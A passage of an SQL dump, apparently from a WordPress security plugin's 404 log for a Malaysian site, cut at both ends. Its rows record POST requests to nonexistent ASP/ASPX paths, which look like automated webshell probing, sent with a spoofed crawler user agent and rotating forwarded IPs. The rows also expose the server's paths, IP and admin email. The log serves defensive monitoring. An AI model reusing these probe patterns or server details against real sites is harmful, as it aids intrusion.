14:30:09',35267696,37075744,'http://bintara.com.my//javascript/fan.asP',1,0,'117.67.4.213'),(28933,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//javascript/fan.asP\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"219.149.124.121\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"219.149.124.121\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/javascript/fan.asP\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/javascript/fan.asP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1ZEq-QPicCh3WFsYdvQAAAJI\";s:12:\"REDIRECT_URL\";s:19:\"/javascript/fan.asP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64637\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/javascript/fan.asP\";s:10:\"SCRIPT_URL\";s:19:\"/javascript/fan.asP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1ZEq-QPicCh3WFsYdvQAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927396.5471\";s:12:\"REQUEST_TIME\";s:10:\"1571927396\";}}','notice','2019-10-24 14:29:58','2019-10-24 14:29:57',35268632,37070376,'http://bintara.com.my//javascript/fan.asP',1,0,'219.149.124.121'),(28932,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//javascript/fan.asP\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"118.212.252.222\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"118.212.252.222\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/javascript/fan.asP\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/javascript/fan.asP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1U-5cHc@dX2BdZ47D-QAAAAE\";s:12:\"REDIRECT_URL\";s:19:\"/javascript/fan.asP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64261\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/javascript/fan.asP\";s:10:\"SCRIPT_URL\";s:19:\"/javascript/fan.asP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1U-5cHc@dX2BdZ47D-QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927379.6604\";s:12:\"REQUEST_TIME\";s:10:\"1571927379\";}}','notice','2019-10-24 14:29:41','2019-10-24 14:29:40',35269264,37074632,'http://bintara.com.my//javascript/fan.asP',1,0,'118.212.252.222'),(28931,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//services/jing.ASpx\";s:14:\"CONTENT_LENGTH\";s:3:\"495\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"222.19.192.255\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"222.19.192.255\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1SKHtjB8Y0WvpqtvI@QAAANI\";s:12:\"REDIRECT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63878\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:10:\"SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1SKHtjB8Y0WvpqtvI@QAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927368.3377\";s:12:\"REQUEST_TIME\";s:10:\"1571927368\";}}','notice','2019-10-24 14:29:30','2019-10-24 14:29:28',35266768,37071400,'http://bintara.com.my//services/jing.ASpx',1,0,'222.19.192.255'),(28930,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//services/jing.ASpx\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.241.163.239\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.241.163.239\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1Q6HtjB8Y0WvpqtvI7gAAAMM\";s:12:\"REDIRECT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63878\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:10:\"SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1Q6HtjB8Y0WvpqtvI7gAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927364.0441\";s:12:\"REQUEST_TIME\";s:10:\"1571927364\";}}','notice','2019-10-24 14:29:25','2019-10-24 14:29:24',35269640,37077288,'http://bintara.com.my//services/jing.ASpx',1,0,'61.241.163.239'),(28929,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//services/jing.ASpx\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.97.50.160\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.97.50.160\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1OaHtjB8Y0WvpqtvI6wAAAM0\";s:12:\"REDIRECT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:10:\"SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1OaHtjB8Y0WvpqtvI6wAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927353.6882\";s:12:\"REQUEST_TIME\";s:10:\"1571927353\";}}','notice','2019-10-24 14:29:15','2019-10-24 14:29:14',35338888,37138144,'http://bintara.com.my//services/jing.ASpx',1,0,'218.97.50.160'),(28928,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//services/jing.ASpx\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"220.192.78.13\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"220.192.78.13\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1MqHtjB8Y0WvpqtvI5wAAANE\";s:12:\"REDIRECT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:10:\"SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1MqHtjB8Y0WvpqtvI5wAAANE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927346.4939\";s:12:\"REQUEST_TIME\";s:10:\"1571927346\";}}','notice','2019-10-24 14:29:08','2019-10-24 14:29:06',35266776,37066008,'http://bintara.com.my//services/jing.ASpx',1,0,'220.192.78.13'),(28927,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//services/jing.ASpx\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.38.130.108\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.38.130.108\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1I92Cd74l7secq5lxkwAAAUc\";s:12:\"REDIRECT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63010\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/services/jing.ASpx\";s:10:\"SCRIPT_URL\";s:19:\"/services/jing.ASpx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1I92Cd74l7secq5lxkwAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927331.3133\";s:12:\"REQUEST_TIME\";s:10:\"1571927331\";}}','notice','2019-10-24 14:28:53','2019-10-24 14:28:51',35267280,37070240,'http://bintara.com.my//services/jing.ASpx',1,0,'202.38.130.108'),(28926,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//admin/kelan.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"210.77.175.186\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"210.77.175.186\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/kelan.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/admin/kelan.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1CEq-QPicCh3WFsYcxwAAAIY\";s:12:\"REDIRECT_URL\";s:17:\"/admin/kelan.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"62633\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/kelan.aspx\";s:10:\"SCRIPT_URL\";s:17:\"/admin/kelan.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1CEq-QPicCh3WFsYcxwAAAIY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927304.6358\";s:12:\"REQUEST_TIME\";s:10:\"1571927304\";}}','notice','2019-10-24 14:28:26','2019-10-24 14:28:25',35269304,37070416,'http://bintara.com.my//admin/kelan.aspx',1,0,'210.77.175.186'),(28925,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//admin/kelan.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"123.199.170.20\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"123.199.170.20\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/kelan.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/admin/kelan.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG09Eq-QPicCh3WFsYcswAAAI0\";s:12:\"REDIRECT_URL\";s:17:\"/admin/kelan.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61810\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/kelan.aspx\";s:10:\"SCRIPT_URL\";s:17:\"/admin/kelan.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG09Eq-QPicCh3WFsYcswAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927284.1431\";s:12:\"REQUEST_TIME\";s:10:\"1571927284\";}}','notice','2019-10-24 14:28:06','2019-10-24 14:28:04',35341800,37144864,'http://bintara.com.my//admin/kelan.aspx',1,0,'123.199.170.20'),(28924,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//ajax/jiafuyi.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 